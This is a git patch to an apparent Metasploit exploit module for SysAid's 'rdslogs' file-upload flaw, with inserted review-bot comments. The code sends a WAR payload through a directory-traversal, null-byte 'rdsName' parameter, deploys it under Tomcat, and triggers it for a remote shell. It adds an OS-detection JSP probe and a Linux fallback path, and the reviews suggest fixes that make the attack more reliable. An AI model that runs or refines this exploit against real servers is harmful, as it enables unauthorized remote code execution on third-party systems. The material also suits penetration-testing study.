From 7483e77bbac623981eb29cb8ed8fbb7c3b9ee656 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro
Date: Sat, 18 Jul 2015 20:12:13 +0100
Subject: [PATCH] Fix Linux target by trying again if exploit fails

---
 .../multi/http/sysaid_rdslogs_fle_upload.rb | 103 +++++++++++++-----
 1 file changed, 78 insertions(+), 25 deletions(-)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
index 7e3a02f8de..4c60e5559c 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@@ -75,18 +75,66 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected end end + + + def pick_target + unless target.name == 'Automatic' + return target + end + + print_status("#{peer} - Determining target") + os_finder_payload = %Q{<%out.println(System.getProperty("os.name"));%>} + url = upload_payload(os_finder_payload, false) + + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], url), + 'method' => 'GET', + 'cookie' => @cookie, + 'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) } + }) + + if res && res.code == 200 + if res.body.to_s =~ /Linux/ + register_files_for_cleanup('webapps/' + url) + return targets[1] + elsif res.body.to_s =~ /Windows/ + register_files_for_cleanup('root/' + url) + return targets[2] + end + end + + nil + end + + + def send_payload(war_payload, tomcat_path, app_base) + # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail + print_status("#{peer} - Uploading WAR file...") + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'), + 'method' => 'POST', + 'data' => Zlib::Deflate.deflate(war_payload), + 'ctype' => 'application/octet-stream', + 'vars_get' => { + 'rdsName' => "../../../../#{tomcat_path}#{app_base}.war\x00" + } + }) + + # The server either returns a 200 OK when the upload is successful. + if res && res.code == 200 + print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment") + else + fail_with(Failure::Unknown, "#{peer} - WAR upload failed") + end + end def exploit - app_base = rand_text_alphanumeric(4 + rand(32 - 4)) - tomcat_path = '../../../../' - servlet_path = 'rdslogs' - # We need to create the upload directories before our first attempt to upload the WAR. 
print_status("#{peer} - Creating upload directory") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ - 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), + 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'), 'method' => 'POST', 'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))), 'ctype' => 'application/xml', @@ -95,27 +143,11 @@ class Metasploit3 < Msf::Exploit::Remote } }) + app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s - - # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail - print_status("#{peer} - Uploading WAR file...") - res = send_request_cgi({ - 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), - 'method' => 'POST', - 'data' => Zlib::Deflate.deflate(war_payload), - 'ctype' => 'application/octet-stream', - 'vars_get' => { - 'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00" - } - }) - - # The server either returns a 200 OK when the upload is successful. - if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment") - register_files_for_cleanup("tomcat/webapps/#{app_base}.war") - else - fail_with(Failure::Unknown, "#{peer} - WAR upload failed") - end + + send_payload(war_payload, 'tomcat/webapps/', app_base) + register_files_for_cleanup("tomcat/webapps/#{app_base}.war") 10.times do select(nil, nil, nil, 2) 
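Review bot: `pick_target` is added in this hunk but nothing in the patch calls it — `exploit` (continued in the hunks below) still uploads the Windows path first and blindly retries the Linux path, so the `os.name` probe and the Automatic target are dead code as committed. The probe JSP uploaded through `upload_payload` (not visible in this diff, presumably defined elsewhere in the module) is only registered for cleanup inside the `/Linux/` and `/Windows/` branches, so a non-200 reply or an unrecognised `os.name` leaves a JSP that prints system properties sitting on the target with no cleanup entry and no message. Since the cleanup prefix cannot be chosen on that path, at minimum a `print_warning("#{peer} - Could not determine OS, probe #{url} left on target")` before the fallthrough, and `fail_with(Failure::NoTarget, "#{peer} - Unable to determine target")` instead of returning `nil`, would stop Automatic from silently proceeding with a nil target. The `targets[1]`/`targets[2]` index lookups also depend on the targets array order defined outside this hunk; `targets.find { |t| t.name =~ /Linux/ }` would survive a reorder. `pick_target` and `send_payload` are complete within the hunk; `exploit` begins here and continues past it.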
@@ -131,5 +163,26 @@ class Metasploit3 < Msf::Exploit::Remote
 # Success! Triggered the payload, should have a shell incoming
 break if res.code == 200
 end
+ print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...")
+
+ # OK this might be a Linux server, it's a different traversal path.
+ # Let's try again...
+ send_payload(war_payload, '', app_base)
+ register_files_for_cleanup("webapps/#{app_base}.war")
+
+ 10.times do
+ select(nil, nil, nil, 2)
+
+ # Now make a request to trigger the newly deployed war
+ print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+ 'method' => 'GET'
+ })
+ # Failure. The request timed out or the server went away.
+ break if res.nil?
+ # Success! Triggered the payload, should have a shell incoming
+ break if res.code == 200
+ end
 end
 end
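Review bot: The Linux retry added at the top of this hunk runs unconditionally, including after the first loop breaks on `res.code == 200` — the `break` lines are the last thing before the new `print_error` and nothing records whether the payload fired — so a successful Windows exploitation is followed by a "Failed to launch payload" error, a second WAR written to `../../../../#{app_base}.war`, and a second cleanup entry. Guard the fallback, e.g. `return if session_created?` placed after the first loop's `end` and before the `print_error` (assuming the `Msf::Exploit` helper is available to this module as it is to other HTTP exploits), or set a local flag before the `break` and check it there. The retry loop shown here sleeps a fixed 2 seconds per iteration and ignores the `SLEEP` option that `send_payload`'s status message advertises; the first loop's body starts outside this hunk, so if `SLEEP` is consumed there the two loops are at least inconsistent. The retry loop also exits silently on `res.nil?` with no final error, unlike the first attempt.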